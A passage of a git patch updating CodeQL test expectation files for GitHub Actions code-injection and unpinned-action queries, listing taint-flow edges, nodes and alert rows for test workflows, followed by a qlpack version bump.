.github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | @@ -387,10 +435,15 @@ nodes | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | #select | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | ${{ inputs.taint }} | +| .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | @@ -411,6 +464,9 @@ subpaths | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | ${{ steps.foo.outputs.result }} | +| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | ${{ steps.foo.outputs.result2 }} | +| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | ${{ steps.clone.outputs.result }} | | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 75b64cea3e5..3ad4e6915d2 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -1,5 +1,20 @@ edges -| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result2] | provenance | | +| .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | provenance | | +| .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | provenance | | +| .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | provenance | | +| .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | provenance | | +| .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | provenance | | +| .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | @@ -30,7 +45,13 @@ edges | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | provenance | | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result2] | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | provenance | | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | provenance | | | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | provenance | | +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | provenance | | +| .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | provenance | | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | provenance | | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | provenance | | @@ -72,6 +93,7 @@ edges | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | @@ -129,8 +151,26 @@ nodes | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action5/action.yml:4:3:4:7 | input taint | semmle.label | input taint | -| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | -| .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | semmle.label | inputs.taint | +| .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | semmle.label | output Job outputs node [result2] | +| .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | semmle.label | output Job outputs node [result] | +| .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | semmle.label | steps.step.outputs.result | +| .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | semmle.label | steps.step2.outputs.result2 | +| .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | semmle.label | Run Step: step [result] | +| .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | semmle.label | inputs.taint | +| .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | semmle.label | Run Step: step2 [result2] | +| .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | semmle.label | inputs.taint | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | semmle.label | input title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | semmle.label | output Job outputs node [result] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | semmle.label | steps.out.outputs.replaced | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | @@ -183,7 +223,14 @@ nodes | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result2] | semmle.label | Uses Step: foo [result2] | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | semmle.label | Uses Step: foo [result] | | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | semmle.label | steps.foo.outputs.result | +| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | semmle.label | steps.foo.outputs.result2 | +| .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | semmle.label | Uses Step: clone [result] | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | semmle.label | steps.clone.outputs.result | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | @@ -289,6 +336,7 @@ nodes | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | @@ -387,6 +435,8 @@ nodes | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | #select | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 008c3696789..6d56b99407e 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -19,12 +19,12 @@ | .github/workflows/pr-workflow.yml:60:15:60:52 | amannn/action-semantic-pull-request@v5 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'amannn/action-semantic-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:109:15:109:42 | actionsdesk/lfs-warning@v3.2 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'actionsdesk/lfs-warning' with ref 'v3.2', not a pinned commit hash | .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:144:15:144:43 | cachix/install-nix-action@v20 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:147:15:147:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:147:15:147:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'DeterminateSystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:148:15:148:41 | cachix/cachix-action@master | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:347:15:347:36 | docker/login-action@v2 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'docker/login-action' with ref 'v2', not a pinned commit hash | .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:356:15:356:44 | softprops/action-gh-release@v1 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'softprops/action-gh-release' with ref 'v1', not a pinned commit hash | .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:449:15:449:43 | cachix/install-nix-action@v20 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:452:15:452:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:452:15:452:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'DeterminateSystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:453:15:453:41 | cachix/cachix-action@master | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Uses Step | | .github/workflows/test7.yml:25:15:25:34 | pnpm/action-setup@v3 | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | | .github/workflows/test13.yml:15:13:15:53 | sushichop/action-repository-permission@v2 | Unpinned 3rd party Action 'test13.yml' step $@ uses 'sushichop/action-repository-permission' with ref 'v2', not a pinned commit hash | .github/workflows/test13.yml:14:7:20:4 | Uses Step | Uses Step | From 0d55b4e784117431fd8be4c510a11975d857b5e8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 21:59:10 +0200 Subject: [PATCH 0534/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 84d4f5f3678..4c1252d976d 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.51 +version: 0.1.52 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 0ef4c721e1a..a8c891b256a 100644 --- a/ql/src/qlpack.yml +++ 